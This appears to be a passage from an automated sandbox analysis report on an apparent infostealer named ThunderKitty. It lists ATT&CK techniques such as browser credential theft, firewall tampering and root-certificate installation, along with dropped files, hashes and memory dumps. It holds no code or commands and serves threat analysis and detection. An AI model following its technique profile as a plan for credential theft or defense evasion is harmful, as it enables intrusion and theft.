Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

File and Directory Discovery

T1083

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
724d663b42fbf2544b3328fdcc42f18c

SHA1
53c13dd9c10e3b8601882029f73e3986b0447542

SHA256
3e01270457863fb7c51c846db03cf0728b1e4d451cf7dba47a52e27bb945a35e

SHA512
ee5ffb040a49fcc0c507331c1b95741a1ec4ed516524e2eaaaea76aea15bb2e77d743161085eec519946d1ae458066588b36a5f4b1df41ec70b66780363ea343

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0789009e381ff689e09144d17087b434

SHA1
43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

SHA256
120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

SHA512
4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b1e374796cfd7cb17346f633f5880d6c

SHA1
4f0622701a753ff3e5d42552383919a82490b9f2

SHA256
af080ab2d0d84c84a23c64a9e2532e2bc03651e03806cb9c629d900a33c4e214

SHA512
17cff6debae6ebbd4ffec33a37d85fb3768bae2d644ca9986627be988ce6dcd8d51f5ce5337dab083302bccf505aaa0168c3e1a6bfbd6edad2476f7d48e4ed58

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp

Filesize
1KB

MD5
4c4a6bc34a8c9fa382deec5469062b01

SHA1
78afb38db21ba614190abfc50cd82c63ada683e2

SHA256
deb10b352754e913b49007eae05c657946b9a990def881448e84774415cb29e7

SHA512
ef58c92fba50aeb8b95251e87ed54146436e215ebd07a50febdb474e5b931c877cf8a2d712b1aa5d4724a30a8fadff9e0d982e35f383878a733082b396135a5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp

Filesize
1KB

MD5
f2671224acdb6b287a8e8d998022e9d2

SHA1
1148db5ca8ab1cf9546c15337547287d6a46eda3

SHA256
dcd0a6387f52ddc751b0d7106e07b0511d8c501c5110707bd7c5e68113d68548

SHA512
6441d04b0dd85079dcb1e91828db01ac4bc39399bfca907103a1b81a8420f5657a632ed39cc5737975380b7464916aa52a94a1aaccc7728d2728cd358c994d96

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
93KB

MD5
30c5e4f1a6150bd269f0b8dd1087ef2d

SHA1
6a455ac2f3e19ae7f340e96d178c1632360c7257

SHA256
7d48aed18177c074bab976cd0a19b72a15c7499a395047582ffd5bcf071365ce

SHA512
8ceeb43bea65a010e040f08845cec1443ba23d99ddb733e56a9d04a75a1b138f73cce91fe9bc5081b692c4b9afe6ebe7a7070418fe201a039b5680a76f0d1e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
24KB

MD5
b96519b314630cb60e3ce7c9212c6694

SHA1
36f1b8fad905029f51982b4f408e614ed01df64b

SHA256
5c6c96119c98b3cc42539232a1a3286fa23c16a55408c1c31e0b1bb0fba48e7c

SHA512
0f5ee94496b64639d1a1906e98249fab676e4341a0b1ab0ed2a6f56265dd36d6eb46c61d59a576e12332ed73d82aa2501c8124aa1d67a779e4e7934cdd040be7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgjqwd4b.sip.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.dll

Filesize
4KB

MD5
ae79c0fc0e5e20864ae3654d76607b94

SHA1
b57f8782717e902a478b6bd87e58061e01205424

SHA256
e4d1f1a249685797d2db3444a2bba615b94ee841da2cc246b68c37a7516cc3c2

SHA512
3963a33fb17e8b7929cdd2c00aca7714314beeac28bb3982f970689ee9e25fcc498b06cdade7025d6316936922fcd1980bd6d52a9e0bfaa4499def079abf0234

Download Submit
C:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.dll

Filesize
4KB

MD5
06aa9989d2ef44c5780843fc12a23922

SHA1
e7b6e75e645f1be831ec5c3e6851e08156900599

SHA256
7859a7f54b7acd09b416a20bdf6b5877ff73da0c6a7e309a072ddbb04fa75a8d

SHA512
2a950411eee5c3b9b968e4e4aa423a58251e6a948f43c4a71a6b3fa7e30557186ddc87005a7ee8e04f6e8de09b2466895a223f3f2b9833e92cb8443a9d65f586

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\CSCC001113B445E4201B2C5ACFDA97752E2.TMP

Filesize
652B

MD5
b95879473c8bfd75e0a2cf3ec5ae8284

SHA1
f054e63d02f9f4375768dbc72db4da2bea8c7688

SHA256
3127938d5cfe482668495e56e31006718ce6fd5e63822ccddc3b4782b56f387d

SHA512
a0ce6d7caabf4674197e3a6bc3e2ebbc2f36783a99da2dfab57526131f42da2a4dd75906651cd6dff545addfe4e20c133bd3feaa40b1961ad1b092da0a01541c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.cmdline

Filesize
369B

MD5
6cb667c7df112e36abf577000883cf2c

SHA1
1ceb3e499210b0c62652131387f9ae563a5cba30

SHA256
02b460494f39250ab46359c6cafb0ec367271c4f0be26a488c470499146ca8fd

SHA512
9592c675f2a42492df49da6fdce1eb2445ff8eb7be2760c03c7465d5bf81f19eb48041bd20840a7d259f58d937a3e2ff2d705ba8aa6ab3827fe8987eb8fd6393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\CSC62B24FB44F824CC49CFE77938B4E5798.TMP

Filesize
652B

MD5
6ef72bf6216310f35ef76efa7c72939e

SHA1
fcaf754a63be7b0ce8d8fc85b62b70c6edcf5492

SHA256
8ce14117b1f9a7a745892ae58474ddb1e17c87e3dbc34969958c54d7f8052c45

SHA512
20b9a815e37695696b4d301811eee9eec197a39a262d191c9da5163f142f73bc2413e957c6dd7f96b0e10b3958d0c437de887e3648597ca87dbc19311cf0cb19

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.cmdline

Filesize
369B

MD5
40cd258a8922fe87104ddf0c9ad8a476

SHA1
e63f2a0bfef55cf4c2e7683a6f73add2d93a2a7f

SHA256
781d42725ef0307b3d8208962fb9d4d61122d9bb84b7a3f4de37cc3645da621b

SHA512
4138ae3d9afc3eccb5fe920c78cad528679d6201d1ae61f004a54a6eb2a70a6d51f53bbb96a1fe65c83d39b14cd39e6fc2e19c29fbd03aaa11d4cc3c1208115b

Download Submit
memory/3324-129-0x0000015366F00000-0x0000015366F0A000-memory.dmp

Filesize
40KB

Download
memory/3324-128-0x0000015366F10000-0x0000015366F22000-memory.dmp

Filesize
72KB

Download
memory/3324-77-0x00000153025C0000-0x00000153025C8000-memory.dmp

Filesize
32KB

Download
memory/3324-97-0x0000015366FF0000-0x0000015367014000-memory.dmp

Filesize
144KB

Download
memory/3324-96-0x0000015366FF0000-0x000001536701A000-memory.dmp

Filesize
168KB

Download
memory/3476-11-0x0000025C58600000-0x0000025C58622000-memory.dmp

Filesize
136KB

Download
memory/3476-91-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

Filesize
10.8MB

Download
memory/3476-85-0x0000025C734F0000-0x0000025C73C96000-memory.dmp

Filesize
7.6MB

Download
memory/3476-74-0x0000025C585F0000-0x0000025C585F8000-memory.dmp

Filesize
32KB

Download
memory/3476-0-0x00007FF8DCC73000-0x00007FF8DCC75000-memory.dmp

Filesize
8KB

Download
memory/3476-21-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

Filesize
10.8MB

Download
memory/3476-1-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

Filesize
10.8MB

Download
memory/3980-33-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

Filesize
10.8MB

Download
memory/3980-82-0x00007FF8DCC70000-0x00007FF8DD731000-memory.dmp

Filesize
10.8MB

Download